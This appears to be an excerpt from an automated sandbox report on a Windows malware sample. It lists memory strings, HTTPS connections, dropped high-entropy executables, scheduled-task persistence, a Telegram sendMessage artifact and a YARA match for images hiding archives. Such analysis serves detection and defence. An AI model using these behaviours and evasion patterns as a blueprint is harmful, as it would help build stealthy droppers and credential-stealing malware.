Source: cc6f25572f.exe, 00000010.00000003.2756144153.000002B0C1B04000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756744673.000002B0C1B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/om/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767120337.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766706272.000001D669904000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766455096.000001D66990B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly2p
Source: cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyF6033547
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2874665665.000001D66991B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D66991C000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore2ure
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox7Eult
Source: cc6f25572f.exe, 00000011.00000003.2767999680.000001D669920000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandboxS
Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: cd2469328d.exe, 0000000B.00000003.2662924550.000000000365E000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2742956542.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3650480626.0000000006323000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: cd2469328d.exe, 0000000B.00000003.2662924550.000000000365E000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2742956542.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3650480626.0000000006323000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3762021731.0000000005869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: 2e4e1b8516.exe, 0000002D.00000003.3733054470.0000000001647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50168
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867

Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50060 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50158 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.115:443 -> 192.168.2.4:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50189 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe entropy: 7.99505709583	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe entropy: 7.99505709583	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png entropy: 7.99450935401	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f entropy: 7.99450935401	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip entropy: 7.99352358954	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png entropy: 7.99450935401	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	File created: C:\Users\user\AppData\Local\Temp\main\file.bin entropy: 7.99994867689	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\main\file.zip (copy) entropy: 7.99994867689	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip entropy: 7.9992359396	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip entropy: 7.99771683584	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip entropy: 7.99772074518	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\fuckingdllENCR[1].dll entropy: 7.99823177189	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip entropy: 7.99772354314	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip entropy: 7.99772670895	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip entropy: 7.99772941561	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip entropy: 7.99773141174	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png, type: DROPPED	Matched rule: Detects images embedding archives. Observed in TheRat RAT. Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: 2e4e1b8516.exe, 0000002D.00000000.3476591551.00000000006A2000.00000002.00000001.01000000.0000001E.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.		memstr_1c72478d-5
Source: 2e4e1b8516.exe, 0000002D.00000000.3476591551.00000000006A2000.00000002.00000001.01000000.0000001E.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_715eacc6-a

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

File dump: service123.exe.19.dr 314617856

Jump to dropped file

Drops password protected ZIP file

Source: file.bin.24.dr

Zip Entry: encrypted

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name:
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name: .idata
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name:
Source: cc6b47fc15.exe.5.dr	Static PE information: section name:
Source: cc6b47fc15.exe.5.dr	Static PE information: section name: .idata
Source: cc6b47fc15.exe.5.dr	Static PE information: section name:
Source: random[2].exe0.5.dr	Static PE information: section name:
Source: random[2].exe0.5.dr	Static PE information: section name: .idata
Source: random[2].exe0.5.dr	Static PE information: section name:
Source: b6638733e4.exe.5.dr	Static PE information: section name:
Source: b6638733e4.exe.5.dr	Static PE information: section name: .idata
Source: b6638733e4.exe.5.dr	Static PE information: section name:
Source: random[2].exe1.5.dr	Static PE information: section name:
Source: random[2].exe1.5.dr	Static PE information: section name: .idata
Source: random[2].exe1.5.dr	Static PE information: section name:
Source: b05c9e01f3.exe.5.dr	Static PE information: section name:
Source: b05c9e01f3.exe.5.dr	Static PE information: section name: .idata
Source: b05c9e01f3.exe.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name: .idata
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: c9d0f96e57.exe.5.dr	Static PE information: section name:
Source: c9d0f96e57.exe.5.dr	Static PE information: section name: .idata
Source: c9d0f96e57.exe.5.dr	Static PE information: section name:
Source: random[4].exe.5.dr	Static PE information: section name:
Source: random[4].exe.5.dr	Static PE information: section name: .idata
Source: random[4].exe.5.dr	Static PE information: section name:
Source: 142c991362.exe.5.dr	Static PE information: section name:
Source: 142c991362.exe.5.dr	Static PE information: section name: .idata
Source: 142c991362.exe.5.dr	Static PE information: section name:
Source: random[3].exe1.5.dr	Static PE information: section name:
Source: random[3].exe1.5.dr	Static PE information: section name: .idata
Source: 35f0a75b93.exe.5.dr	Static PE information: section name:
Source: 35f0a75b93.exe.5.dr	Static PE information: section name: .idata
Source: random[3].exe2.5.dr	Static PE information: section name:
Source: random[3].exe2.5.dr	Static PE information: section name: .idata
Source: 54682ac64c.exe.5.dr	Static PE information: section name:
Source: 54682ac64c.exe.5.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File created: C:\Windows\Tasks\Gxtuum.job
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008978BB	0_2_008978BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00897049	0_2_00897049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00898860	0_2_00898860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008931A8	0_2_008931A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00854B30	0_2_00854B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00854DE0	0_2_00854DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00892D10	0_2_00892D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089779B	0_2_0089779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00887F36	0_2_00887F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009E78BB	1_2_009E78BB
